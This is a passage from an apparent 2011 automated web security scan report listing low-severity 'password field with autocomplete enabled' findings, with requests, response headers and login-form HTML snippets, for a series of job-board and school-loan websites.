Cache-Control: no-store, no-cache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=7ru8l85l763haf7r7bf41h50d6; path=/; domain=lawcrossing.com
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:29:49 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 103222

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_path = '';
HTT
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="" onsubmit="return login();">
                       <input type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
me" size="14" maxlength="25" tabindex="1" class="inputbox" value="Username" onfocus="setfocusvalue(this,'Username');" onblur="getfocusvalue(this,'Username');">
    &nbsp;&nbsp;<input type="password" name="clslogin_password" maxlength="16" size="16" tabindex="2" class="inputbox" value="*****" onfocus="setfocusvalue(this,'*****');" onblur="getfocusvalue(this,'*****');">
&nbsp;&nbsp;<input type="submit" name="submit" value="Log In" tabindex="3" class="button">
...[SNIP]...

11.83. http://www.lawschoolloans.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.lawschoolloans.com
Path:   /

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.lawschoolloans.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 19:41:18 GMT
Server: Apache
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Set-Cookie: PHPSESSID=e93dd05f80eebb1753b70ce5d0a8fbb2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 226477

<script type="text/javascript" src="http://www.lawschoolloans.com/script/overlibmws.js"></script>
<script type="text/javascript" src="http://www.lawschoolloans.com/script/overlibmws_scroll.js"></scrip
...[SNIP]...
<td width="4%"><form name="formlogin" method="POST" onsubmit="return validateLoginForm();">
                       <input type="hidden" name="clslsluserlogin_hdnsubmited" value="1">
...[SNIP]...
<td width="70%"><input type="password" name="clsregistration_password" size="25" class="input"></td>
...[SNIP]...

11.84. http://www.logisticscrossing.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.logisticscrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.logisticscrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:38:47 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=bge253g268slkfifh0ptl28dv1; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:38:47 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:38:47 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:38:47 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:38:47 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:38:47 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:38:47 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:38:47 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:38:47 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 113290

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.logisticscrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

11.85. http://www.managercrossing.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.managercrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.managercrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:23:11 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=346sk676v0frg7f966ahgna1s4; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:23:11 GMT
Set-Cookie: useripcountry=277; expires=Sat, 29-Jan-2011 01:23:11 GMT
Set-Cookie: useripstate=3896; expires=Sat, 29-Jan-2011 01:23:11 GMT
Set-Cookie: useripcity=2655979; expires=Sat, 29-Jan-2011 01:23:11 GMT
Set-Cookie: usercountry=277; expires=Sat, 29-Jan-2011 01:23:11 GMT
Set-Cookie: userstate=3896; expires=Sat, 29-Jan-2011 01:23:11 GMT
Set-Cookie: usercity=2655979; expires=Sat, 29-Jan-2011 01:23:11 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Sat, 29-Jan-2011 01:23:11 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 128519

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.managercrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

11.86. http://www.manufacturingcrossing.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.manufacturingcrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.manufacturingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:22:44 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=5ot5i4vicpofvo6i92rqjh7uc5; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:22:44 GMT
Set-Cookie: useripcountry=277; expires=Sat, 29-Jan-2011 01:22:44 GMT
Set-Cookie: useripstate=3896; expires=Sat, 29-Jan-2011 01:22:44 GMT
Set-Cookie: useripcity=2655979; expires=Sat, 29-Jan-2011 01:22:44 GMT
Set-Cookie: usercountry=277; expires=Sat, 29-Jan-2011 01:22:44 GMT
Set-Cookie: userstate=3896; expires=Sat, 29-Jan-2011 01:22:44 GMT
Set-Cookie: usercity=2655979; expires=Sat, 29-Jan-2011 01:22:44 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Sat, 29-Jan-2011 01:22:44 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 121467

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.manufacturingcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

11.87. http://www.marketingcrossing.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.marketingcrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.marketingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:24:40 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: PHPSESSID=mv80mss0p40gngko1vhkar5f43; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Set-Cookie: flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:24:40 GMT
Set-Cookie: useripcountry=277; expires=Sat, 29-Jan-2011 01:24:40 GMT
Set-Cookie: useripstate=3896; expires=Sat, 29-Jan-2011 01:24:40 GMT
Set-Cookie: useripcity=2655979; expires=Sat, 29-Jan-2011 01:24:40 GMT
Set-Cookie: usercountry=277; expires=Sat, 29-Jan-2011 01:24:40 GMT
Set-Cookie: userstate=3896; expires=Sat, 29-Jan-2011 01:24:40 GMT
Set-Cookie: usercity=2655979; expires=Sat, 29-Jan-2011 01:24:40 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Sat, 29-Jan-2011 01:24:40 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 131870

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.marketingcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

11.88. http://www.mediajobcrossing.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.mediajobcrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.mediajobcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:23:20 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=bppv1icf1cusbde0ltp6efc6u0; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:23:20 GMT
Set-Cookie: useripcountry=277; expires=Sat, 29-Jan-2011 01:23:20 GMT
Set-Cookie: useripstate=3896; expires=Sat, 29-Jan-2011 01:23:20 GMT
Set-Cookie: useripcity=2655979; expires=Sat, 29-Jan-2011 01:23:20 GMT
Set-Cookie: usercountry=277; expires=Sat, 29-Jan-2011 01:23:20 GMT
Set-Cookie: userstate=3896; expires=Sat, 29-Jan-2011 01:23:20 GMT
Set-Cookie: usercity=2655979; expires=Sat, 29-Jan-2011 01:23:20 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Sat, 29-Jan-2011 01:23:20 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 122753

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.mediajobcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

11.89. http://www.medicalschoolloans.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.medicalschoolloans.com
Path:   /

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.medicalschoolloans.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:29:49 GMT
Server: Apache/2.2.3 (Red Hat) DAV/2 PHP/5.1.6 mod_python/3.2.8 Python/2.4.3 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 mod_perl/2.0.4 Perl/v5.8.8
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=p6p8q6ke8luivjdor0r4lolo34; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 92734

<script language="javascript" type="text/javascript" src="http://www.medicalschoolloans.com/script/overlibmws.js"></script>
<script language="javascript" type="text/javascript" src="http://www.medical
...[SNIP]...
<table width="100%" cellpadding="0" cellspacing="0" border="0" style="background-color:#f8f8f8;">
                   <form action="/index.php" name="formaccountlogin" method="post">
   <tr>
...[SNIP]...
<td><input type="password" name="clsregistration_password" class="inputbox" value="Password" onclick="emptytxtboxpassword();"></td>
...[SNIP]...

11.90. http://www.militarycrossing.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.militarycrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.militarycrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:29:30 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=a4ria9ol92rvm2rjro93htql36; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:29:30 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:29:30 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:29:30 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:29:30 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:29:30 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:29:30 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:29:30 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:29:30 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 104750

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.militarycrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

11.91. http://www.nursingcrossing.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.nursingcrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.nursingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:23:57 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=t4okj4bg6oif378439t4l99v56; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:23:58 GMT
Set-Cookie: useripcountry=277; expires=Sat, 29-Jan-2011 01:23:58 GMT
Set-Cookie: useripstate=3896; expires=Sat, 29-Jan-2011 01:23:58 GMT
Set-Cookie: useripcity=2655979; expires=Sat, 29-Jan-2011 01:23:58 GMT
Set-Cookie: usercountry=277; expires=Sat, 29-Jan-2011 01:23:58 GMT
Set-Cookie: userstate=3896; expires=Sat, 29-Jan-2011 01:23:58 GMT
Set-Cookie: usercity=2655979; expires=Sat, 29-Jan-2011 01:23:58 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Sat, 29-Jan-2011 01:23:58 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 104463

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.nursingcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

11.92. http://www.occupationaltherapycrossing.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.occupationaltherapycrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.occupationaltherapycrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:43:24 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=a2a5vtclildmv21469nm7krd85; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:43:24 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:43:24 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:43:24 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:43:24 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:43:24 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:43:24 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:43:24 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:43:24 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 106436

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.occupationaltherapycrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

11.93. http://www.operationscrossing.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.operationscrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.operationscrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:24:02 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=pb54cpbbhj2rk90gr90bf4h334; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:24:02 GMT
Set-Cookie: useripcountry=277; expires=Sat, 29-Jan-2011 01:24:02 GMT
Set-Cookie: useripstate=3896; expires=Sat, 29-Jan-2011 01:24:02 GMT
Set-Cookie: useripcity=2655979; expires=Sat, 29-Jan-2011 01:24:02 GMT
Set-Cookie: usercountry=277; expires=Sat, 29-Jan-2011 01:24:02 GMT
Set-Cookie: userstate=3896; expires=Sat, 29-Jan-2011 01:24:02 GMT
Set-Cookie: usercity=2655979; expires=Sat, 29-Jan-2011 01:24:02 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Sat, 29-Jan-2011 01:24:02 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 118168

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.operationscrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

11.94. http://www.parttimecrossing.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.parttimecrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.parttimecrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:29:13 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=ij1mnbg5ljm83h4g6kns0vi4c5; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:29:13 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:29:13 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:29:13 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:29:13 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:29:13 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:29:13 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:29:13 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:29:13 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 110601

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.parttimecrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

11.95. http://www.pharmaceuticalcrossing.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.pharmaceuticalcrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.pharmaceuticalcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:43:20 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=kufoga5sm934qb7mfhn708np70; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:43:21 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:43:21 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:43:21 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:43:21 GMT
